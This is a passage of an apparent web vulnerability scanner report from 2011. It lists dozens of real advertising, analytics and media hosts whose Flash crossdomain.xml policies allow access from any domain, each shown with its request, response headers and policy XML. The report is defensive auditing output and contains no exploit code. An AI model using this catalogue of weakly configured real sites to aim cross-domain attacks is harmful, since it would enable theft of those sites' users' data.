<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

4.9. http://b.voicefive.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.voicefive.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b.voicefive.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Wed, 15 Jun 2011 00:16:56 GMT
Date: Tue, 14 Jun 2011 00:16:56 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

4.10. http://bs.serving-sys.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: bs.serving-sys.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=2592000
Content-Type: text/xml
Last-Modified: Thu, 21 Aug 2008 15:23:00 GMT
Accept-Ranges: bytes
ETag: "0e2c3cba13c91:0"
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Tue, 14 Jun 2011 00:13:56 GMT
Connection: close
Content-Length: 100

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>


4.11. http://community.mtv.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.mtv.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: community.mtv.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Mon, 23 May 2011 08:23:53 GMT
Accept-Ranges: bytes
ETag: "a4283dc02219cc1:0"
Server: Microsoft-IIS/7.0
Server: w06w
App: ww
P3P: CP="NON DSP COR ADM DEV PSA PSD IVA OUR BUS STA"
Content-Length: 183
Date: Tue, 14 Jun 2011 00:27:49 GMT
Connection: close

...<?xml version="1.0" encoding="utf-8" ?>
<cross-domain-policy>
   <allow-access-from domain="*"/>
   <allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>

4.12. http://d3.zedo.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d3.zedo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: d3.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Last-Modified: Mon, 18 May 2009 07:34:56 GMT
ETag: "3a9d108-f8-46a2ad4ab2800"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/xml
Content-Length: 248
Date: Tue, 14 Jun 2011 00:28:48 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.zedo.com -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

4.13. http://d7.zedo.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: d7.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Content-Length: 247
Content-Type: application/xml
ETag: "1b42679-f7-44d91b52c0400"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=6860
Date: Tue, 14 Jun 2011 00:28:50 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.zedo.com -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

4.14. http://daapiak.flux.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://daapiak.flux.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: daapiak.flux.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Mon, 23 May 2011 08:22:37 GMT
Accept-Ranges: bytes
ETag: "cc124932219cc1:0"
Server: Microsoft-IIS/7.0
Server: w06g
P3P: CP="NON DSP COR ADM DEV PSA PSD IVA OUR BUS STA"
App: wg
Content-Length: 247
Cache-Control: max-age=600
Date: Tue, 14 Jun 2011 00:19:08 GMT
Connection: close

...<?xml version="1.0" encoding="utf-8" ?>
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only"/>
   <allow-access-from domain="*"/>
   <allow-http-request-headers-from d
...[SNIP]...

4.15. http://ds.serving-sys.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.serving-sys.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ds.serving-sys.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Thu, 20 Aug 2009 15:36:15 GMT
Server: Microsoft-IIS/6.0
Date: Tue, 14 Jun 2011 00:13:57 GMT
Content-Length: 100
Connection: close
Accept-Ranges: bytes

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>


4.16. http://en.gravatar.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://en.gravatar.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: en.gravatar.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:30:09 GMT
Content-Type: application/xml
Connection: close
Last-Modified: Wed, 08 Sep 2010 18:32:05 GMT
Accept-Ranges: bytes
Content-Length: 261

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

4.17. http://farm1.static.flickr.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://farm1.static.flickr.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: farm1.static.flickr.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Tue, 14 Jun 2011 00:24:37 GMT
Content-Type: text/plain
Content-Length: 265
Last-Modified: Thu, 07 Apr 2011 17:55:07 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<site-control permitt
...[SNIP]...

4.18. http://farm2.static.flickr.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://farm2.static.flickr.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: farm2.static.flickr.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Tue, 14 Jun 2011 00:24:37 GMT
Content-Type: text/plain
Content-Length: 265
Last-Modified: Thu, 07 Apr 2011 17:16:19 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<site-control permitt
...[SNIP]...

4.19. http://farm3.static.flickr.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://farm3.static.flickr.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: farm3.static.flickr.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Tue, 14 Jun 2011 00:24:37 GMT
Content-Type: text/plain
Content-Length: 265
Last-Modified: Thu, 07 Apr 2011 22:37:29 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<site-control permitt
...[SNIP]...

4.20. http://farm4.static.flickr.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://farm4.static.flickr.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: farm4.static.flickr.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Tue, 14 Jun 2011 00:24:37 GMT
Content-Type: text/plain
Content-Length: 265
Last-Modified: Wed, 13 Apr 2011 15:31:30 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<site-control permitt
...[SNIP]...

4.21. http://farm5.static.flickr.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://farm5.static.flickr.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: farm5.static.flickr.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Tue, 14 Jun 2011 00:24:37 GMT
Content-Type: text/plain
Content-Length: 265
Last-Modified: Wed, 13 Apr 2011 16:10:03 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<site-control permitt
...[SNIP]...

4.22. http://farm6.static.flickr.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://farm6.static.flickr.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: farm6.static.flickr.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Tue, 14 Jun 2011 00:24:37 GMT
Content-Type: text/plain
Content-Length: 265
Last-Modified: Thu, 14 Apr 2011 04:15:28 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<site-control permitt
...[SNIP]...

4.23. http://fls.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: fls.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Mon, 13 Jun 2011 20:44:07 GMT
Expires: Tue, 17 May 2011 18:17:24 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 12596
Cache-Control: public, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

4.24. http://gs.mtv.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gs.mtv.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: gs.mtv.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 21 May 2008 22:04:19 GMT
ETag: "5febfdd-222-c7459ec0"
Accept-Ranges: bytes
Content-Length: 546
Content-Type: application/xml
Cache-Control: max-age=600
Date: Tue, 14 Jun 2011 00:19:46 GMT
Connection: close

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/
...[SNIP]...
<allow-access-from domain="*" />
<allow-access-from domain="*" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.mtvi.com" />
<allow-access-from domain="*.mtvi.com" to-ports="80,443,10000" />
...[SNIP]...

4.25. http://i0.poll.fm/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://i0.poll.fm
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: i0.poll.fm

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Content-Type: text/xml
Date: Tue, 14 Jun 2011 00:32:50 GMT
Last-Modified: Tue, 15 Jun 2010 12:42:06 GMT
Server: nginx
Content-Length: 214
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-
...[SNIP]...

4.26. http://ib.adnxs.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ib.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 15-Jun-2011 12:02:44 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Mon, 12-Sep-2011 12:02:44 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

4.27. http://imx.mtv.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://imx.mtv.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: imx.mtv.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
Last-Modified: Tue, 15 Apr 2008 20:18:17 GMT
ETag: "4b5484c-117-44aef19c7b440"
Accept-Ranges: bytes
Content-Length: 279
Content-Type: application/xml
Cache-Control: max-age=600
Date: Tue, 14 Jun 2011 00:20:17 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" secure="false" />
   <al
...[SNIP]...

4.28. http://js.revsci.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: js.revsci.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/xml
Date: Tue, 14 Jun 2011 00:13:54 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- allow Flash 7+ players to invoke JS from this server -->
<cross-domain-po
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

4.29. http://l.yimg.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://l.yimg.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: l.yimg.com

Response

HTTP/1.0 200 OK
Date: Mon, 13 Jun 2011 02:20:28 GMT
Cache-Control: max-age=315360000
Expires: Thu, 10 Jun 2021 02:20:28 GMT
Last-Modified: Mon, 01 Feb 2010 17:51:55 GMT
Accept-Ranges: bytes
Content-Length: 408
Vary: Accept-Encoding
Content-Type: application/xml
Age: 79361
Server: YTS/1.19.5

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xs
...[SNIP]...
<allow-access-from domain="*" secure="false" />
...[SNIP]...

4.30. http://log30.doubleverify.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://log30.doubleverify.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: log30.doubleverify.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Sun, 17 Jan 2010 09:19:04 GMT
Accept-Ranges: bytes
ETag: "034d21c5697ca1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 14 Jun 2011 00:30:12 GMT
Connection: close
Content-Length: 378

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-control permitted-cross-dom
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

4.31. http://m.webtrends.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://m.webtrends.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: m.webtrends.com

Response

HTTP/1.1 200 OK
Content-Length: 82
Content-Type: text/xml
Last-Modified: Thu, 20 Dec 2007 20:24:48 GMT
Accept-Ranges: bytes
ETag: "ef9fe45d4643c81:762"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 14 Jun 2011 00:34:17 GMT
Connection: close

<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

4.32. http://m1.zedo.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://m1.zedo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: m1.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Last-Modified: Mon, 19 May 2008 09:08:32 GMT
ETag: "1b42679-f7-44d91b52c0400"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/xml
Content-Length: 247
Date: Tue, 14 Jun 2011 00:29:11 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.zedo.com -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

4.33. http://mswindowswolglobal.112.2o7.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mswindowswolglobal.112.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: mswindowswolglobal.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:34:25 GMT
Server: Omniture DC/2.0.0
xserver: www420
Content-Length: 167
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

4.34. http://mtv.mtvnimages.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mtv.mtvnimages.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: mtv.mtvnimages.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
X-Powered-By: mtvnimages.com version 1.5.56 (r248708)
ETag: W/"203-1306441848000"
Last-Modified: Thu, 26 May 2011 20:30:48 GMT
Content-Length: 203
Content-Type: text/xml
Cache-Control: max-age=63882
Date: Tue, 14 Jun 2011 00:15:00 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-polic
...[SNIP]...

4.35. http://now.eloqua.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://now.eloqua.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: now.eloqua.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0
Content-Type: text/xml
Last-Modified: Tue, 26 May 2009 19:46:00 GMT
Accept-Ranges: bytes
ETag: "04c37983adec91:0"
Server: Microsoft-IIS/7.5
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
Date: Tue, 14 Jun 2011 12:27:59 GMT
Connection: keep-alive
Content-Length: 206

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
   SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-p
...[SNIP]...

4.36. http://om.dowjoneson.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://om.dowjoneson.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: om.dowjoneson.com

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:13:57 GMT
Server: Omniture DC/2.0.0
xserver: www68
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

4.37. http://ping1.unicast.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ping1.unicast.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ping1.unicast.com

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 14:19:55 GMT
Server: Jetty(6.1.22)
Cache-Control: no-cache
content-type: application/xml
Via: 1.0 rhv192178010000 (MII-APC/1.6)
Content-Length: 1152
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
...[SNIP]...
<allow-access-from domain="*" secure="false" />
...[SNIP]...

4.38. http://pix04.revsci.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pix04.revsci.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/xml
Date: Tue, 14 Jun 2011 00:13:55 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- allow Flash 7+ players to invoke JS from this server -->
<cross-domain-po
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

4.39. http://pixel.quantserve.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Wed, 15 Jun 2011 00:16:32 GMT
Content-Type: text/xml
Content-Length: 207
Date: Tue, 14 Jun 2011 00:16:32 GMT
Server: QS

<?xml version="1.0"?>
